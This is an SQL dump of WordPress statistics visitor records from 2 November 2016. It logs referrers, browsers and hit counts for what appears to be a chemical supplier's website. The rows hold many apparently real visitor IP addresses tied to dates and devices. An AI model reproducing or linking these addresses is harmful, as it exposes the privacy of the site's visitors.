INSERT INTO `wp_statistics_visitor` VALUES (14880, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiRwaapq4rQAhVE2SYKHVZqCA0QFggtMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '216.253.200.130', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14881, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '71.47.1.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14882, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '192.80.95.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14883, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.134.38.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14884, '2016-11-02', 'https://tw.search.yahoo.com/', 'Chrome', 'Windows', '43.0.2357.134', '', '1.175.237.48', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14885, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '23.228.141.40', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14886, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14887, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiOz8G-rorQAhUb8YMKHcUTDy8QFghRMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2F&usg=AFQjCNG9rxN-loo47flpbq4TFJUAtJ1HDg&sig2=DxK0jiAn_a01I-vgw7IzHQ&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '72.45.207.106', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14888, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '208.79.246.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14889, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '68.40.60.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14890, '2016-11-02', 'https://www.bing.com/search?q=krytox+gol-215&form=IE10TR&src=IE10TR&pc=MDDRJS', 'MSIE', 'Windows', '11.0', '', '68.178.28.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14891, '2016-11-02', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '71.180.29.137', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14892, '2016-11-02', 'https://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjDhubor4rQAhXh7YMKHQO4BCQQFgg3MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fxht-sx%2F&usg=AFQjCNFow59y8mMi5U4fokzJZ1bbjJj8rw&bvm=bv.137132246,d.d24', 'MSIE', 'Windows', '11.0', '', '83.211.10.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14893, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '167.115.115.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14894, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14895, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '162.17.44.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14896, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.40.12.162', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14897, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14898, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '129.176.151.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14899, '2016-11-02', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '11.0', '', '129.176.151.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14900, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '47.221.156.117', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14901, '2016-11-02', 'https://www.google.it/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.11.12.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14902, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.98.161.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14903, '2016-11-02', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'Safari', 'iPhone', '7.0', '', '157.55.2.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14904, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Macintosh', '48.0', '', '67.140.67.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14905, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiwsYaKtorQAhUMfX4KHcnOCacYABAA&sig=AOD64_0AWDDUdP88yJT-sr8LKVX6rietXA&rct=j&q=&ved=0ahUKEwjn6oKKtorQAhWollQKHeEdCe04FBDRDAgZ&adurl=', 'MSIE', 'Windows', '11.0', '', '139.68.134.1', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14906, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '131.137.245.206', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14907, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '109.99.28.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14908, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '206.197.198.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14909, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.25.241.246', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14910, '2016-11-02', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.111', '', '177.75.85.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14911, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '174.219.16.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14912, '2016-11-02', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '107.183.36.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14913, '2016-11-02', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.183.36.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14914, '2016-11-02', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '107.183.36.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14915, '2016-11-02', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '8.39.23.185', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14916, '2016-11-02', 'https://www.adsensecustomsearchads.com/', 'Edge', 'Windows', '14.14393', '', '207.61.255.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14917, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.194.227.91', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14918, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.36.244.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14919, '2016-11-02', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '99.75.165.93', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14920, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.130.32.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14921, '2016-11-02', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '199.30.25.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14922, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '66.110.213.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14923, '2016-11-02', 'https://www.directindustry.fr/prod/miller-stephenson-chemical-co/product-173822-1749965.html', 'Chrome', 'Windows', '54.0.2840.71', '', '90.63.223.234', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14924, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14925, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '54.0.2840.71', '', '76.88.35.111', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14926, '2016-11-02', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.34.150.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14927, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '47.34.150.75', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14928, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiIq-frworQAhUX4GMKHeANBbkQFgg0MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw&sig2=SXu_S9mC_6vUn1tGUnl7UQ', 'MSIE', 'Windows', '11.0', '', '38.107.150.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14929, '2016-11-02', 'https://www.bing.com/search?q=acrylic+coating&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14930, '2016-11-02', 'https://www.miller-stephenson.com/product/acrylic-coating/', 'MSIE', 'Windows', '9.0', '', '204.79.180.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14931, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '75.133.142.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14932, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '8.0', '', '220.181.51.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14933, '2016-11-02', 'https://www.bing.com/search?q=stripping%20agents%20to%20cut%20epoxy&pivot=web&mkt=en-US&setlang=en-US&input=1', 'IEMobile', 'Windows Phone', '11.0', '', '24.233.228.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14934, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14935, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14936, '2016-11-02', 'https://www.miller-stephenson.com/product/157-fsl/', 'Chrome', 'Windows', '53.0.2785.143', '', '157.204.1.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14937, '2016-11-02', 'https://mmr.mschem.com/miller/pdf/MS-795,%20797.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '50.241.95.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14938, '2016-11-02', 'https://www.bing.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '97.75.72.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14939, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.44.9.70', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14940, '2016-11-02', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiOsKaKyYrQAhVCan4KHTGMB7wYABAA&sig=AOD64_0OXT6M6nZBcdvHBi6qpLMs3q5j5g&rct=j&q=&ved=0ahUKEwiGn6GKyYrQAhXIjFQKHe96ASoQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '74.15.180.120', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14941, '2016-11-02', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '209.34.10.100', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14942, '2016-11-02', 'https://www.google.ro/', 'Chrome', 'Windows', '54.0.2840.71', '', '82.78.95.56', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14943, '2016-11-02', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwikvayaw4rQAhVMGpQKHakPAYEQFghkMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox-automotive-lubricants%2F&usg=AFQjCNESe5JES73PhPXioSt0HeUPTwM3_g', 'MSIE', 'Windows', '11.0', '', '61.200.16.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14944, '2016-11-02', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '52.78.19.5', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14945, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.130.215.123', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14946, '2016-11-02', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '50.78.202.1', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14947, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj79N2UyorQAhVHzlQKHW_kARIQFghFMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=NjUrgyp2JnLGPGvTT1RBCQ&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '64.211.108.11', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14948, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '47.185.158.239', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14949, '2016-11-02', 'https://ttsgco.blogfa.com/', 'Safari', 'Macintosh', '10.0.1', '', '76.25.172.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14950, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj8xLyMy4rQAhVLOCYKHdRwBGoQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '200.38.16.53', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14951, '2016-11-02', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.191.170.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14952, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '149.32.192.42', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14953, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwidiIq-y4rQAhUEQBoKHRtlAJ0QFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.d2s', 'MSIE', 'Windows', '11.0', '', '107.135.200.133', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14954, '2016-11-02', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '54.200.86.7', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14955, '2016-11-02', 'https://vadimkravtcov.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.165.57', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14956, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.71.125.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14957, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '209.234.214.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14958, '2016-11-02', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '98.117.67.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14959, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '72.176.36.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14960, '2016-11-02', 'https://www.bing.com/search?q=MILLER-STEPHENSON+CHEMICAL&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14961, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14962, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi06fGM0IrQAhVHYyYKHeruCWEQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.eWE', 'MSIE', 'Windows', '11.0', '', '157.127.124.157', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14963, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '198.190.156.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14964, '2016-11-02', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '166.137.10.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14965, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.195.52.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14966, '2016-11-02', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Chrome', 'Windows', '53.0.2785.116', '', '31.14.16.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14967, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '58.62.235.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14968, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14969, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14970, '2016-11-02', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '72.4.203.130', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14971, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '71.212.227.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14972, '2016-11-02', 'https://www.google.co.il/', 'Chrome', 'Windows', '54.0.2840.71', '', '5.102.207.208', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14973, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiyrtbm04rQAhVEbn4KHZ91DpQYABAA&sig=AOD64_3Q0T5cIJ6sNazqyuaiPgOtDcj5eg&rct=j&q=&ved=0ahUKEwiWl87m04rQAhVrllQKHRtYAGoQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '70.97.186.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14974, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.55.188.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14975, '2016-11-02', 'https://www.google.com.ar/', 'Chrome', 'Windows', '54.0.2840.71', '', '181.170.146.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14976, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14977, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14978, '2016-11-02', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6', '', '81.174.128.122', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14979, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14980, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.9.127.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14981, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.29.161.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14982, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiQrqH1jorQAhVEbiYKHciACmgQFghUMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fmold-release-agents%2F&usg=AFQjCNHhgyC2pnZej0928BNtU-741d08wg', 'MSIE', 'Windows', '11.0', '', '70.89.77.193', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14983, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjgpfmr2orQAhUJW4YKHVEKCPgYABAA&ei=9DAaWK2-FsnGmQGt9YKoDA&sig=AOD64_2S0wiPg_7IcGJlx2PiVZ7eqyDjAg&rct=j&q=&sqi=2&ved=0ahUKEwitiPOr2orQAhVJYyYKHa26AMUQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '50.233.58.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14984, '2016-11-02', 'https://www.google.ca/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '129.97.124.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14985, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '41.0.2227.1', '', '54.228.75.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14986, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '149.32.192.39', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14987, '2016-11-02', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjVkfu_3IrQAhUB6CYKHVcCD0kQFgibATAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-100%2F&usg=AFQjCNHPJSNGJ7C9DJ0T2ATyYgDAnAeKPA', 'MSIE', 'Windows', '11.0', '', '12.217.223.160', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14988, '2016-11-02', 'https://mmr.mschem.com/miller/pdf/MS-122XD,%20143XD.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '12.216.186.42', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14989, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.246.15.87', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14990, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.147.57.84', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14991, '2016-11-02', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '216.223.138.1', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14992, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.255.31.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14993, '2016-11-02', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '50.241.95.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14994, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14995, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14996, '2016-11-02', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '72.174.240.66', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14997, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.186.254.194', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14998, '2016-11-02', 'https://www.google.ca/', 'Safari', 'iPad', '10.0', '', '209.222.173.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14999, '2016-11-02', 'https://heatpower.ru/', 'Unknown', 'Unknown', 'Unknown', '', '178.137.165.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15000, '2016-11-02', 'https://www.photorepair.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.165.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15001, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjNr8X15orQAhULC2kKHcN8DEQYABAA&sig=AOD64_15xnn3xaeyafrPhhomK9hI3lxV_A&rct=j&q=&ved=0ahUKEwiU3sH15orQAhXn1IMKHQQKAEUQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '66.212.153.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15002, '2016-11-02', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjvnMy75IrQAhUPMGkKHfVACtYYABAF&sig=AOD64_0ZRAU0taXt7z_s_P41SyMKpKKM1A&rct=j&q=&ved=0ahUKEwimg8m75IrQAhUHzIMKHSz-BhAQ0QwIbA&adurl=', 'MSIE', 'Windows', '11.0', '', '100.34.148.135', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15003, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '104.11.140.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15004, '2016-11-02', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.29.132.5', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15005, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15006, '2016-11-02', 'https://50.62.30.35/phpmyadmin', 'MSIE', 'Windows', '9.0', '', '118.178.228.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15007, '2016-11-02', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.240.158.249', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15008, '2016-11-02', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2600:8804:8640:220e:c17f:8545:2978:6aef', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15009, '2016-11-02', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '40.87.70.28', '000', 22, 0); 
